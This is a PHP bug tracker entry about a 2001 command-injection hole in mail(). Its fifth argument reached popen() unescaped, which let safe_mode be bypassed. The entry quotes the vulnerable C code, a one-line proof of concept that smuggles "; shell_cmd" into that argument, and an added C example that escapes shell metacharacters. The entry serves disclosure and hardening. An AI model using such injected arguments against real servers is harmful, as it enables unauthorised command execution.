ID: 12268
Updated by: rasmus
Reported By: [EMAIL PROTECTED]
Old Status: Open
Status: Closed
Bug Type: *Mail Related
Operating System: Any
PHP Version: 4.0.5
New Comment:
Fixed a while ago in CVS
Previous Comments:
------------------------------------------------------------------------
[2001-07-19 19:29:34] [EMAIL PROTECTED]
http://www.net-security.org/text/bugs/995534103,28541,.shtml:
PHP Mail Function Vulnerability
Posted on 19.7.2001
php mail() function does not check for escape shell commands, even if
php is running in safe_mode.
So it may be possible to bypass the safe_mode restriction and gain shell
access.
Affected:
php4.0.6
php4.0.5
Significant lines of ext/standard/mail.c:
>extra_cmd = (*argv[4])->value.str.val;
>strcat (sendmail_cmd, extra_cmd);
>sendmail = popen(sendmail_cmd, "w");
Exploit:
mail("[EMAIL PROTECTED]",
"test",
"test",
"test", "; shell_cmd");
------------------------------------------------------------------------
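Added example, not part of the original report or of PHP's source: the concatenation pattern quoted above, next to one way to neutralise shell metacharacters in the extra argument before the string reaches popen(). The function names, the metacharacter list and the sendmail path are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Characters /bin/sh treats specially; each is backslash-escaped below (assumed list). */
static const char SHELL_META[] = "#&;`|*?~<>^()[]{}$\\\n\"'";

/* Pattern from the report: the caller-supplied fifth argument is appended
 * verbatim, so a later popen() would hand any ';' or '|' in it to the shell.
 * Returns 0 on success, -1 if the result would not fit in out. */
int build_cmd_unescaped(char *out, size_t outsz, const char *sendmail, const char *extra)
{
    int n = snprintf(out, outsz, "%s %s", sendmail, extra);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Hardened form: escape every metacharacter in extra, with bounds checks
 * instead of an unchecked strcat(). Spaces stay unescaped so that several
 * sendmail options can still be passed. Returns 0 or -1 as above. */
int build_cmd_escaped(char *out, size_t outsz, const char *sendmail, const char *extra)
{
    int n = snprintf(out, outsz, "%s ", sendmail);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    size_t pos = (size_t)n;
    for (const char *p = extra; *p != '\0'; p++) {
        if (strchr(SHELL_META, *p) != NULL) {
            if (pos + 1 >= outsz)
                return -1;
            out[pos++] = '\\';
        }
        if (pos + 1 >= outsz)
            return -1;
        out[pos++] = *p;
    }
    out[pos] = '\0';
    return 0;
}

int main(void)
{
    char cmd[256];
    const char *extra = "; shell_cmd";   /* fifth argument from the report */
    build_cmd_unescaped(cmd, sizeof cmd, "/usr/sbin/sendmail -t -i", extra);
    printf("unescaped: %s\n", cmd);
    build_cmd_escaped(cmd, sizeof cmd, "/usr/sbin/sendmail -t -i", extra);
    printf("escaped:   %s\n", cmd);
    return 0;
}
```

Escaping keeps the shell in the path; passing the arguments as an argv array to an exec-family call avoids shell parsing altogether.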
--
PHP Development Mailing List <http://www.php.net/>